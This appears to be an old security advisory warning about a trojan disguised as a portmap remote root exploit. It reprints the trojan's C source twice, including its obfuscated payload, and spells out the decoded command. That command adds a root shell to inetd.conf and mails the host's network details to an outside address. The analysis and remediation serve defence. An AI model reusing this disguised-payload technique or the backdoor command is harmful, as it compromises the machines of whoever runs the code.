COMMAND
portmap exploit trojans
SYSTEMS AFFECTED
Anyone who compiles and runs unreviewed "exploit" code from an untrusted source, particularly as root. The trojan compromises the machine it is run on, not the target named on its command line.
PROBLEM
'goatkiller' warned about the following. A trojan is being spread to clueless kiddies. It claims to be a remote root exploit for portmap on Red Hat boxes, but it never attacks the target at all: it appends a root shell entry to /etc/inetd.conf on the machine it is run on, restarts inetd, and mails that machine's IP address (the output of ifconfig -a) to goat187@hotmail.com. The "shellcode" in the source is not machine code; each byte is an ASCII character plus 53, and main() subtracts 53 from every byte and passes the result to system(), which is hidden behind `#define pmap_proc_p system`. The actual command that gets executed follows:
/bin/echo "65139 stream tcp nowait root /bin/sh sh -i" >>
/etc/inetd.conf ; /bin/killall -1 inetd 2>&1 1>/dev/null ;
/sbin/ifconfig -a | mail goat187@hotmail.com 2>&1 2>/dev/null
The code below is the trojan described above, given twice: first the copy annotated with a warning by whoever caught it, then the file as it was originally distributed (the same source without the added warning lines):
/*
Do not run unless you know what you are doing , and DONT RUN IT
AS ROOT. It Puts a ROOTSHELL in your inetd.conf and mails them
your IP address.
PRIVATE !!! DO NOT DISTRIBUTE THIS !!! PRIVATE (DOnT RUN its a
TROJAN)
portmap remote root linux exploit (TROJAN) (no stack patch)
by horizon - jmcdonald@unf.edu
This was tested against redhat box with 2.2.9 kernel.
(shouldn't need offset)
BIG thanks to stran9er who wrote this shellcode!!
greets to: #!ADM and users @ el8.org ;)
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#define NOP 0x90            /* never used: decoration, no NOP sled is ever built */
#define RET 0xbfffec90      /* never used: decoration, no return address is ever sent */
#define PORT 5760           /* port rshell() connects to on the target */
/* The hook: the "pmap_proc_p(...)" call in main() is really system(3), so the
 * decoded "shellcode" is executed as a shell command on THIS machine. */
#define pmap_proc_p system
/* Not machine code. Every byte is an ASCII character plus 53 (0x35); subtracting
 * 53 from each yields the shell command that appends
 * "65139 stream tcp nowait root /bin/sh sh -i" to /etc/inetd.conf, HUPs inetd
 * and mails the output of `ifconfig -a` to goat187@hotmail.com. The literal is
 * 179 bytes long including the trailing newline (0x3f). */
char *shellcode =
"\x64\x97\x9e\xa3\x64\x9a\x98\x9d\xa4\x55\x57\x6b\x6a\x66\x68\x6e\x55\xa8\xa9"
"\xa7\x9a\x96\xa2\x55\xa9\x98\xa5\x55\xa3\xa4\xac\x96\x9e\xa9\x55\xa7\xa4\xa4"
"\xa9\x55\x64\x97\x9e\xa3\x64\xa8\x9d\x55\xa8\x9d\x55\x62\x9e\x57\x55\x73\x73"
"\x55\x64\x9a\xa9\x98\x64\x9e\xa3\x9a\xa9\x99\x63\x98\xa4\xa3\x9b\x55\x70\x55"
"\x64\x97\x9e\xa3\x64\xa0\x9e\xa1\xa1\x96\xa1\xa1\x55\x62\x66\x55\x9e\xa3\x9a"
"\xa9\x99\x55\x67\x73\x5b\x66\x55\x66\x73\x64\x99\x9a\xab\x64\xa3\xaa\xa1\xa1"
"\x55\x70\x55\x64\xa8\x97\x9e\xa3\x64\x9e\x9b\x98\xa4\xa3\x9b\x9e\x9c\x55\x62"
"\x96\x55\xb1\x55\xa2\x96\x9e\xa1\x55\x9c\xa4\x96\xa9\x66\x6d\x6c\x75\x9d\xa4"
"\xa9\xa2\x96\x9e\xa1\x63\x98\xa4\xa2\x55\x67\x73\x5b\x66\x55\x67\x73\x64\x99"
"\x9a\xab\x64\xa3\xaa\xa1\xa1\x3f";
/* Return the larger of two ints; when they are equal either one is returned. */
int max(int x, int y)
{
return (y < x) ? x : y;
}
/*
 * Interactive client for the "root shell": connects to TCP port PORT (5760)
 * on `host`, sends a fingerprint command, then relays stdin to the socket
 * and the socket to stdout until the peer closes. Never returns: every exit
 * path calls exit().
 *
 * For readers of this trojan: the decoded payload opens port 65139 on the
 * machine that RAN the program, not port 5760 on `host`, so against a host
 * with nothing listening on 5760 this typically dies at connect() with
 * "Connection refused" -- which makes the trojan look like a failed exploit.
 */
void rshell(char *host)
{
int sockfd, maxfd, n;
struct sockaddr_in cli;
char sendln[1024], recvln[1024];
struct hostent *hp;
fd_set rset;
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket");
exit(-1);
}
/* hp is resolved but never used: the address below comes from
 * inet_addr(host), so only a dotted-quad argument actually works. */
if((hp = gethostbyname(host)) == NULL){
perror("gethostbyname");
exit(-1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(PORT);
cli.sin_addr.s_addr = inet_addr(host);
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect");
exit(-1);
}
/* A successful connect is taken as proof of a shell; nothing is verified. */
printf("root shell found!\n");
strcpy(sendln, "uname -a; pwd; id;\n");
write(sockfd, sendln, strlen(sendln));          /* return value ignored */
FD_ZERO(&rset);
for(;;){
/* select() clears descriptors that were not ready, so both are re-armed
 * on every iteration. */
FD_SET(fileno(stdin), &rset);
FD_SET(sockfd, &rset);
maxfd = max(fileno(stdin), sockfd) + 1;
select(maxfd, &rset, NULL, NULL, NULL);       /* return value ignored */
if(FD_ISSET(fileno(stdin), &rset)){
bzero(sendln, sizeof(sendln));
fgets(sendln, sizeof(sendln)-2, stdin);       /* result unchecked: EOF on stdin is not handled */
write(sockfd, sendln, strlen(sendln));
}
if(FD_ISSET(sockfd, &rset)){
/* Zeroing first is what NUL-terminates the data for fputs; a read that
 * fills all 1024 bytes leaves it unterminated. */
bzero(recvln, sizeof(recvln));
if((n = read(sockfd, recvln, sizeof(recvln))) ==
0){
printf("Connection closed.\n");
exit(0);
}
if(n < 0){
perror("read");
exit(-1);
}
fputs(recvln, stdout);
}
}
}
/*
 * Entry point. Despite the name of the macro, no exploit packet is ever
 * sent to the target: the "shellcode" is decoded into a shell command string
 * and run locally through system(3) (pmap_proc_p is #defined to system
 * above). argv[1] is only used afterwards as the host rshell() connects to.
 * The "[offset]" argument advertised in the usage line is never read; the
 * offset is the fixed decode key 53.
 */
void main(int argc, char **argv)
{
CLIENT *cli;                      /* never used: decoration to look like an RPC client */
int i = 0, offset = 53;           /* 53 is the key: every payload byte is ASCII + 53 */
char *portmap;                    /* receives the decoded shell command */
char *buf;                        /* never initialised; see the strcpy below */
if(argc < 2){
printf("usage: %s <ip> [offset]\n", argv[0]);
exit(-1);
}
/* 154 bytes are allocated, but the encoded literal is 179 bytes long, so the
 * decode loop writes past the end of the allocation. A failed malloc is
 * reported but not fatal, after which the loop writes through NULL. */
if((portmap = (char *) malloc(154)) == NULL) {
perror("malloc");
}
/* Decode: subtract the key from every byte of the literal. No NUL terminator
 * is appended, so the command string relies on whatever happens to follow
 * the buffer on the heap. */
while(*shellcode) {
portmap[i] = *shellcode - offset;
shellcode++; i++;
}
/* THIS IS THE TROJAN: system() runs the decoded command on the machine
 * running this program -- it appends a root shell to /etc/inetd.conf, HUPs
 * inetd and mails the output of `ifconfig -a` to the author. */
pmap_proc_p(portmap);
printf("sending shellcode... connecting to remote host\n");   /* nothing was sent */
rshell(argv[1]);
/* Not reached in practice (rshell never returns). If it were, buf is an
 * uninitialised pointer and this strcpy would crash. */
strcpy(buf, portmap);
exit(-1);
}
---------------------------------------SNIP------------Snip----
/*
PRIVATE !!! DO NOT DISTRIBUTE THIS !!! PRIVATE
portmap remote root linux exploit (no stack patch)
by horizon - jmcdonald@unf.edu
This was tested against redhat box with 2.2.9 kernel.
(shouldn't need offset)
BIG thanks to stran9er who wrote this shellcode!!
greets to: #!ADM and users @ el8.org ;)
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#define NOP 0x90            /* unused decoy: no NOP sled is ever built */
#define RET 0xbfffec90      /* unused decoy: no return address is ever sent */
#define PORT 5760           /* port rshell() connects to on the target */
/* The hook: the pmap_proc_p() call in main() is really system(3), so the
 * decoded "shellcode" is executed as a shell command on the local machine. */
#define pmap_proc_p system
/* Not machine code. Each byte is an ASCII character plus 53 (0x35); main()
 * subtracts 53 from every byte to recover a shell command that appends
 * "65139 stream tcp nowait root /bin/sh sh -i" to /etc/inetd.conf, HUPs inetd
 * and mails the output of `ifconfig -a` to goat187@hotmail.com. The literal
 * holds 179 bytes, the last one (0x3f) decoding to a newline. */
char *shellcode =
"\x64\x97\x9e\xa3\x64\x9a\x98\x9d\xa4\x55\x57\x6b\x6a\x66\x68\x6e\x55\xa8\xa9"
"\xa7\x9a\x96\xa2\x55\xa9\x98\xa5\x55\xa3\xa4\xac\x96\x9e\xa9\x55\xa7\xa4\xa4"
"\xa9\x55\x64\x97\x9e\xa3\x64\xa8\x9d\x55\xa8\x9d\x55\x62\x9e\x57\x55\x73\x73"
"\x55\x64\x9a\xa9\x98\x64\x9e\xa3\x9a\xa9\x99\x63\x98\xa4\xa3\x9b\x55\x70\x55"
"\x64\x97\x9e\xa3\x64\xa0\x9e\xa1\xa1\x96\xa1\xa1\x55\x62\x66\x55\x9e\xa3\x9a"
"\xa9\x99\x55\x67\x73\x5b\x66\x55\x66\x73\x64\x99\x9a\xab\x64\xa3\xaa\xa1\xa1"
"\x55\x70\x55\x64\xa8\x97\x9e\xa3\x64\x9e\x9b\x98\xa4\xa3\x9b\x9e\x9c\x55\x62"
"\x96\x55\xb1\x55\xa2\x96\x9e\xa1\x55\x9c\xa4\x96\xa9\x66\x6d\x6c\x75\x9d\xa4"
"\xa9\xa2\x96\x9e\xa1\x63\x98\xa4\xa2\x55\x67\x73\x5b\x66\x55\x67\x73\x64\x99"
"\x9a\xab\x64\xa3\xaa\xa1\xa1\x3f";
/* Larger of two ints (equal inputs return that common value). */
int max(int x, int y)
{
int larger = y;
if(y < x)
larger = x;
return larger;
}
/*
 * Interactive client for the supposed root shell on `host`:PORT (5760).
 * Connects, sends "uname -a; pwd; id;", then copies stdin to the socket and
 * the socket to stdout until the peer closes. Does not return: every exit
 * path calls exit().
 *
 * Note that the decoded payload installs its inetd listener on port 65139 of
 * the machine that ran this program, not on port 5760 of `host`; unless
 * something happens to listen on 5760 there, this typically fails at
 * connect(), so the trojan looks like an exploit that did not work.
 */
void rshell(char *host)
{
int sockfd, maxfd, n;
struct sockaddr_in cli;
char sendln[1024], recvln[1024];
struct hostent *hp;
fd_set rset;
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket");
exit(-1);
}
/* hp is never used; the address is taken from inet_addr(host) below, so the
 * argument has to be a dotted quad. */
if((hp = gethostbyname(host)) == NULL){
perror("gethostbyname");
exit(-1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(PORT);
cli.sin_addr.s_addr = inet_addr(host);
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect");
exit(-1);
}
/* Any accepted connection is reported as a root shell; nothing is checked. */
printf("root shell found!\n");
strcpy(sendln, "uname -a; pwd; id;\n");
write(sockfd, sendln, strlen(sendln));          /* short/failed write ignored */
FD_ZERO(&rset);
for(;;){
/* Both descriptors are re-added each pass because select() strips the
 * ones that were not ready. */
FD_SET(fileno(stdin), &rset);
FD_SET(sockfd, &rset);
maxfd = max(fileno(stdin), sockfd) + 1;
select(maxfd, &rset, NULL, NULL, NULL);       /* return value ignored */
if(FD_ISSET(fileno(stdin), &rset)){
bzero(sendln, sizeof(sendln));
fgets(sendln, sizeof(sendln)-2, stdin);       /* NULL (EOF/error) not checked */
write(sockfd, sendln, strlen(sendln));
}
if(FD_ISSET(sockfd, &rset)){
/* The bzero is the only thing that NUL-terminates recvln for fputs; a
 * full 1024-byte read leaves it unterminated. */
bzero(recvln, sizeof(recvln));
if((n = read(sockfd, recvln, sizeof(recvln))) == 0){
printf("Connection closed.\n");
exit(0);
}
if(n < 0){
perror("read");
exit(-1);
}
fputs(recvln, stdout);
}
}
}
/*
 * Entry point. Nothing is ever sent to the target before the "exploit"
 * fires: the byte-shifted literal is decoded into a shell command and handed
 * to system(3) through the pmap_proc_p macro, i.e. run on the local machine.
 * argv[1] is used only later, as the host rshell() connects to; the
 * "[offset]" in the usage line is never read -- offset is the fixed decode
 * key 53.
 */
void main(int argc, char **argv)
{
CLIENT *cli;                      /* unused decoy so the file looks like an RPC client */
int i = 0, offset = 53;           /* decode key: every payload byte is ASCII + 53 */
char *portmap;                    /* decoded shell command */
char *buf;                        /* never initialised; see the strcpy below */
if(argc < 2){
printf("usage: %s <ip> [offset]\n", argv[0]);
exit(-1);
}
/* The literal is 179 bytes but only 154 are allocated, so the decode loop
 * runs past the end of the block. A NULL from malloc is reported but not
 * fatal; the loop then writes through NULL. */
if((portmap = (char *) malloc(154)) == NULL) {
perror("malloc");
}
/* Decode in place into portmap. No terminating NUL is written, so what
 * system() sees after the newline depends on the heap contents. */
while(*shellcode) {
portmap[i] = *shellcode - offset;
shellcode++; i++;
}
/* THE TROJAN: pmap_proc_p is system(), so the decoded command runs here --
 * it appends a root shell to /etc/inetd.conf, HUPs inetd and mails the
 * output of `ifconfig -a` to the author. */
pmap_proc_p(portmap);
printf("sending shellcode... connecting to remote host\n");   /* nothing was sent */
rshell(argv[1]);
/* Not reached: rshell() never returns. Were it reached, buf is an
 * uninitialised pointer and the strcpy would crash. */
strcpy(buf, portmap);
exit(-1);
}
SOLUTION
Nothing to patch; the only defence is not to run code you have not read. Before compiling any third-party exploit, read the source and be suspicious of a #define that aliases an innocent-looking name to system(), of "shellcode" that is a byte-shifted ASCII string rather than machine code, and of an "exploit" that never sends its payload over the network -- all three are visible in the listing above. If you already ran it, remove the "65139 stream tcp nowait root /bin/sh sh -i" line from /etc/inetd.conf, restart inetd, and treat the host as compromised, since its address has been mailed to the author. ADM is aware of at least a few ADM-like trojan horses: ADMnlockd, portmap.c and ADMmountd2.tgz. None of those were written by ADM. The last one includes a worm; be very careful. ADM has set up a 'FAKES' archive on our official ftp server. You can find all those fake ADM exploits at:
ftp://adm.freelsd.net/pub/ADM/FAKES/